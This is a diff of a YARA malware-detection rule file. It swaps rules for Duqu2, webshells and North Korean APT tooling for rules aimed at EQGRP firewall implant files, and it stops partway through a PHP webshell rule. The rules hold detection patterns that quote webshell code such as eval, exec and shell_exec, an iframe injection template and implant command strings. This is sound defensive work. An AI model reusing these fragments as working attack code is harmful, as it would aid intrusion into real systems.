+		hash1 = "692fdb449f10057a114cf2963000f52ce118d9a40682194838006c66af159bd0"
 
 	strings:
-		$s1 = "=<=Q=W=a=g=p=v=|=" fullword ascii
-		$s2 = ">#>(>.>3>=>]>d>p>" fullword ascii
+		$s1 = "memset 00e9a05c 4 38845b88" fullword ascii
+		$s2 = "_hidecmd" ascii
+		$s3 = "memset 013abd04 1 0d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_Duqu2_Sample3 : FILE
+rule SIGNATURE_BASE_EQGRP_BICECREAM : FILE
 {
 	meta:
-		description = "Detects Duqu2 Malware"
+		description = "EQGRP Toolset Firewall - file BICECREAM-2140"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c558445f-fbe3-57db-80f7-09a87b097921"
-		date = "2016-07-02"
+		id = "a10819ae-db48-5d30-8e2e-2e4fe33e005b"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L52-L66"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L761-L782"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4adaf71a4acd8ce122af0b6f1267dc34c5190efcb4a6fa3322c1e6cf67a546a5"
-		score = 80
+		logic_hash = "adaa6b7d4bf9e6f95fbae781382e72afc07993582473cbee7139a93df0fe3283"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69"
+		hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210"
 
 	strings:
-		$s1 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
+		$s1 = "Could not connect to target device: %s:%d. Please check IP address." fullword ascii
+		$s2 = "command data size is invalid for an exec cmd" fullword ascii
+		$s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii
+		$s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" fullword ascii
+		$s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" fullword ascii
+		$s6 = "[%d] Execute code." fullword ascii
+		$s7 = "Execute 0x%08x with args (%08x): [y/n]" fullword ascii
+		$s8 = "dump_value_LHASH_DOALL_ARG" fullword ascii
+		$s9 = "Eggcode is complete. Pass execution to it? [y/n]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and $s1 )
+		( uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Duqu2_Sample4 : FILE
+rule SIGNATURE_BASE_EQGRP_Create_Http_Injection : FILE
 {
 	meta:
-		description = "Detects Duqu2 Malware"
+		description = "EQGRP Toolset Firewall - file create_http_injection.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c5ca68d-762c-5d2e-8d37-f58dc66bcae2"
-		date = "2016-07-02"
+		id = "92b6dad0-c7d8-5522-8fc1-fbd0aae00960"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L68-L85"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L784-L802"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ddecd1d7fa007b83fe6e29ac8983d02511a89a16ab2365f8086ec92a52d4bf33"
-		score = 80
+		logic_hash = "3a2ee46c6fec1b7a501e8c0e2963d4873ede89d192d0f4701d051f782e8ece99"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3536df7379660d931256b3cf49be810c0d931c3957c464d75e4cba78ba3b92e3"
+		hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d"
 
 	strings:
-		$x1 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
-		$s2 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
-		$s3 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
-		$s4 = "ProcessUserAccounts" fullword ascii
+		$x1 = "required by SECONDDATE" fullword ascii
+		$s1 = "help='Output file name (optional). By default the resulting data is written to stdout.')" fullword ascii
+		$s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii
+		$s3 = "version='%prog 1.0'," fullword ascii
+		$s4 = "usage='%prog [ ... options ... ] url'," fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) ) or ( all of them )
+		( uint16( 0 ) == 0x2123 and filesize < 3KB and ( $x1 or 2 of them ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Duqu2_Uas : FILE
+rule SIGNATURE_BASE_EQGRP_BFLEA_2201 : FILE
 {
 	meta:
-		description = "Detects Duqu2 Executable based on the specific UAs in the file"
+		description = "EQGRP Toolset Firewall - file BFLEA-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d82f6351-fab0-5324-850f-dd40a172fceb"
-		date = "2016-07-02"
+		id = "7dfdc2a2-73d1-5eba-8936-ed14b17495c5"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_duqu2.yar#L86-L104"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L804-L823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bf27ca851c580080514dfa886c0d7c69ac114efb5dbc35ccd1e7686c3dd44b1"
-		score = 80
-		quality = 85
+		logic_hash = "d0fd4d0ffe98856abed685c4b9ff770daba22aa16bd860440874fd94df2d54ea"
+		score = 75
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "52fe506928b0262f10de31e783af8540b6a0b232b15749d647847488acd0e17a"
-		hash2 = "81cdbe905392155a1ba8b687a02e65d611b60aac938e470a76ef518e8cffd74d"
+		hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e"
 
 	strings:
-		$x1 = "Mozilla/5.0 (Windows NT 6.1; U; ru; rv:5.0.1.6) Gecko/20110501 Firefox/5.0.1 Firefox/5.0.1" fullword wide
-		$x2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7xs5D9rRDFpg2g" fullword wide
-		$x3 = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322)" fullword wide
-		$x4 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110612 Firefox/6.0a2" fullword wide
+		$s1 = ".got_loader" fullword ascii
+		$s2 = "LOADED" fullword ascii
+		$s3 = "readFlashHandler" fullword ascii
+		$s4 = "KEEPGOING" fullword ascii
+		$s5 = "flashRtnsPix6x.c" fullword ascii
+		$s6 = "fix_ip_cksum_incr" fullword ascii
+		$s7 = "writeFlashHandler" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 5 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Gifcloaked_Webshell_A : FILE
+rule SIGNATURE_BASE_EQGRP_Bpfcreator_RHEL4 : FILE
 {
 	meta:
-		description = "Looks like a webshell cloaked as GIF"
+		description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fdef65c-204a-5019-9b4f-c5877c3e39d4"
-		date = "2023-12-05"
+		id = "476185f2-b093-5fb9-8604-891e96fe52a9"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/yara_mixed_ext_vars.yar#L180-L201"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L825-L842"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
-		logic_hash = "0c4570373d50c40745cd0523dcf8c34ee3cae1c298982b3a39d4a33e054aa779"
-		score = 60
+		logic_hash = "8586425b13355170137d66fe8d52ed98982d7c5699b26a8c0132f107b4af43d8"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92"
 
 	strings:
-		$s0 = "input type"
-		$s1 = "<%eval request"
-		$s2 = "<%eval(Request.Item["
-		$s3 = "LANGUAGE='VBScript'"
-		$s4 = "$_REQUEST" fullword
-		$s5 = ";eval("
-		$s6 = "base64_decode"
-		$fp1 = "<form name=\"social_form\""
+		$s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" fullword ascii
+		$s2 = "error reading dump file: %s" fullword ascii
+		$s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" fullword ascii
+		$s4 = "%s: link-layer type %d isn't supported in savefiles" fullword ascii
+		$s5 = "DLT %d is not one of the DLTs supported by this device" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x38464947 and ( 1 of ( $s* ) ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_APT_PY_Bluelight_Loader : INKYSQUID
+rule SIGNATURE_BASE_EQGRP_Storefc
 {
 	meta:
-		description = "Python Loader used to execute the BLUELIGHT malware family."
-		author = "threatintel@volexity.com"
-		id = "f8da3e40-c3b0-5b7f-8ece-81874993d8cd"
-		date = "2021-06-22"
+		description = "EQGRP Toolset Firewall - file StoreFc.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "48bbf5c9-e884-5126-93a2-d27650409882"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L39-L58"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L844-L859"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e7e18a6d648b1383706439ba923335ac4396f6b5d2a3dc8f30f63ded7df29eda"
+		logic_hash = "f07c3ef83808852f70fb5cbc4436d531675344ab74f83888cd70d987c3544cce"
 		score = 75
 		quality = 85
-		tags = "INKYSQUID"
-		hash1 = "80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108"
 
 	strings:
-		$s1 = "\"\".join(chr(ord(" ascii
-		$s2 = "import ctypes " ascii
-		$s3 = "ctypes.CFUNCTYPE(ctypes.c_int)" ascii
-		$s4 = "ctypes.memmove" ascii
-		$s5 = "python ended" ascii
+		$x1 = "Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii
+		$x2 = "raise Exception, \"Must supply both a config file and implant file.\"" fullword ascii
+		$x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" fullword ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Win_Decrok : INKYSQUID
+rule SIGNATURE_BASE_EQGRP_Hexdump : FILE
 {
 	meta:
-		description = "The DECROK malware family, which uses the victim's hostname to decrypt and execute an embedded payload."
-		author = "threatintel@volexity.com"
-		id = "dc83843d-fd2a-52f1-82e8-8e36b135a0c5"
-		date = "2021-06-23"
+		description = "EQGRP Toolset Firewall - file hexdump.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "32a7d845-2fa3-5d8f-84e1-2c7f8d2ca8c8"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L61-L82"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L861-L877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855"
-		logic_hash = "47fa03e95ac17ba7195858cd63b1769e5d56ab8a5edf872b345989b767050b87"
+		logic_hash = "ed36aa5a69296088bdd1db42e6561377294b7bd99c30104b9d4a618d899d7e9a"
 		score = 75
 		quality = 85
-		tags = "INKYSQUID"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a"
 
 	strings:
-		$v1 = {C7 ?? ?? ?? 01 23 45 67 [2-20] C7 ?? ?? ?? 89 AB CD EF C7 ?? ?? ?? FE DC BA 98}
-		$av1 = "Select * From AntiVirusProduct" wide
-		$av2 = "root\\SecurityCenter2" wide
-		$funcformat = { 25 30 32 78 [0-10] 43 72 65 61 74 65 54 68 72 65 61 64 }
+		$s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" fullword ascii
+		$s2 = "print >>out, \"%s%04x  \" % (lead,i)," fullword ascii
+		$s3 = "print >>out, \"%02X\" % ord(x[i+j])," fullword ascii
+		$s4 = "print >>out, sane(x[i:i+16])" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x2123 and filesize < 1KB and 2 of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT_NK_Scarcruft_RUBY_Shellcode_XOR_Routine : APT
+rule SIGNATURE_BASE_EQGRP_BBALL : FILE
 {
 	meta:
-		description = "Detects Ruby ShellCode XOR routine used by ScarCruft APT group"
-		author = "S2WLAB_TALON_JACK2"
-		id = "c393f2db-8ade-5083-9cec-f62f23056f8b"
-		date = "2021-05-20"
+		description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L104-L133"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L879-L898"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a97041a06729d639c22a4ee272cc96555345b692fc0da8b62e898891d02b23ea"
+		logic_hash = "b02d17a13725b5215c89590abf77f960e79f9fd155c9ea4e9eb903710a7a375e"
 		score = 75
-		quality = 85
-		tags = "APT"
-		type = "APT"
-		version = "0.1"
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6"
 
 	strings:
-		$hex1 = {C1 C7 0D 40 F6 C7 01 74 ?? 81 F7}
-		$hex2 = {41 C1 C2 0D 41 8B C2 44 8B CA 41 8B CA 41 81 F2}
+		$s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" fullword ascii
+		$s2 = ".got_loader" fullword ascii
+		$s3 = "handler_readBIOS" fullword ascii
+		$s4 = "cmosReadByte" fullword ascii
+		$s5 = "KEEPGOING" fullword ascii
+		$s6 = "checksumAreaConfirmed.0" fullword ascii
+		$s7 = "writeSpeedPlow.c" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 4 of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT_NK_Scarcruft_Evolved_ROKRAT : APT FILE
+rule SIGNATURE_BASE_EQGRP_BARPUNCH_BPICKER : FILE
 {
 	meta:
-		description = "Detects RokRAT malware used by ScarCruft APT group"
-		author = "S2WLAB_TALON_JACK2"
-		id = "53cabf41-0154-5372-b667-60d8a7cb9806"
-		date = "2021-07-09"
+		description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7e88ba9d-1f15-533a-b388-a2a027ddb07c"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_inkysquid.yar#L135-L179"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L902-L921"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "01a2f410687c943d6c6e421ffacfe42f9e7b6afb82e43ba03a8d525e075a3a3c"
+		logic_hash = "f5d0cc881bedad736a90109933da8dbd32c4435aa255676c68ae3541bbb61e74"
 		score = 75
 		quality = 85
-		tags = "APT, FILE"
-		type = "APT"
-		version = "0.1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+		hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
 
 	strings:
-		$AES_IV_KEY = {
-        C7 44 24 ?? 32 31 12 23
-        C7 44 24 ?? 34 45 56 67
-        C7 44 24 ?? 78 89 9A AB
-        C7 44 24 ?? 0C BD CE DF
-        C7 45 ?? 2B 7E A5 16
-        C7 45 ?? 28 AE D2 A6
-        C7 45 ?? AB F7 15 88
-        C7 45 ?? 09 CF 4F 3C
-        }
-		$url_deocde = {
-               80 E9 0F
-               80 F1 C8
-               88 48 ??
-               48 83 EA 01  }
+		$x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u" fullword ascii
+		$x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" fullword ascii
+		$x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" fullword ascii
+		$x4 = "%s version %s already has persistence installed. If you want to uninstall," fullword ascii
+		$x5 = "The active module(s) on the target are not meant to be persisted" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		( uint16( 0 ) == 0x457f and filesize < 6000KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic : FILE
+rule SIGNATURE_BASE_EQGRP_Implants_Gen6 : FILE
 {
 	meta:
-		description = "php webshell having some kind of input and some kind of payload. restricted to small files or big ones including suspicious strings"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "294ce5d5-55b2-5c79-b0f8-b66f949efbb2"
-		date = "2021-01-14"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L83-L411"
+		description = "EQGRP Toolset Firewall"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1b1c6426-7274-5fd4-9ea2-ef10bda769d4"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L923-L951"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd"
-		hash = "6bf351900a408120bee3fc6ea39905c6a35fe6efcf35d0a783ee92062e63a854"
-		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
-		hash = "00813155bf7f5eb441e1619616a5f6b21ae31afc99caa000c4aafd54b46c3597"
-		hash = "e31788042d9cdeffcb279533b5a7359b3beb1144f39bacdd3acdef6e9b4aff25"
-		hash = "36b91575a08cf40d4782e5aebcec2894144f1e236a102edda2416bc75cbac8dd"
-		hash = "a34154af7c0d7157285cfa498734cfb77662edadb1a10892eb7f7e2fb5e2486c"
-		hash = "791a882af2cea0aa8b8379791b401bebc235296858266ddb7f881c8923b7ea61"
-		hash = "9a8ab3c225076a26309230d7eac7681f85b271d2db22bf5a190adbf66faca2e6"
-		hash = "0d3ee83adc9ebf8fb1a8c449eed5547ee5e67e9a416cce25592e80963198ae23"
-		hash = "3d8708609562a27634df5094713154d8ca784dbe89738e63951e12184ff07ad6"
-		hash = "70d64d987f0d9ab46514abcc868505d95dbf458387f858b0d7580e4ee8573786"
-		hash = "259b3828694b4d256764d7d01b0f0f36ca0526d5ee75e134c6a754d2ab0d1caa"
-		hash = "04d139b48d59fa2ef24fb9347b74fa317cb05bd8b7389aeb0a4d458c49ea7540"
-		hash = "58d0e2ff61301fe0c176b51430850239d3278c7caf56310d202e0cdbdde9ac3f"
-		hash = "731f36a08b0e63c63b3a2a457667dfc34aa7ff3a2aee24e60a8d16b83ad44ce2"
-		hash = "e4ffd4ec67762fe00bb8bd9fbff78cffefdb96c16fe7551b5505d319a90fa18f"
-		hash = "fa00ee25bfb3908808a7c6e8b2423c681d7c52de2deb30cbaea2ee09a635b7d4"
-		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
-		hash = "e9423ad8e51895db0e8422750c61ef4897b3be4292b36dba67d42de99e714bff"
-		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
-		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
-		hash = "3de8c04bfdb24185a07f198464fcdd56bb643e1d08199a26acee51435ff0a99f"
-		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
-		hash = "a09dcf52da767815f29f66cb7b03f3d8c102da5cf7b69567928961c389eac11f"
-		hash = "d9ae762b011216e520ebe4b7abcac615c61318a8195601526cfa11bbc719a8f1"
-		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
-		logic_hash = "03c1963ec7a0409970baa98dc3a62f721c092b41d4026475a38b1ef466426b75"
-		score = 70
-		quality = -134
+		logic_hash = "9f0aa1994199c8cef543b7602b574726171dd96df159a0c496db0c60c339c4d0"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash7 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$wfp_tiny1 = "escapeshellarg" fullword
-		$wfp_tiny2 = "addslashes" fullword
-		$gfp_tiny3 = "include \"./common.php\";"
-		$gfp_tiny4 = "assert('FALSE');"
-		$gfp_tiny5 = "assert(false);"
-		$gfp_tiny6 = "assert(FALSE);"
-		$gfp_tiny7 = "assert('array_key_exists("
-		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
-		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
-		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
-		$gfp_tiny11 = "; This is the recommended, PHP 4-style version of the php.ini-dist file"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp8 = /\(\s?\$_HEADERS\s?[\)\[]/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
-		$inp20 = "TSOP_" wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
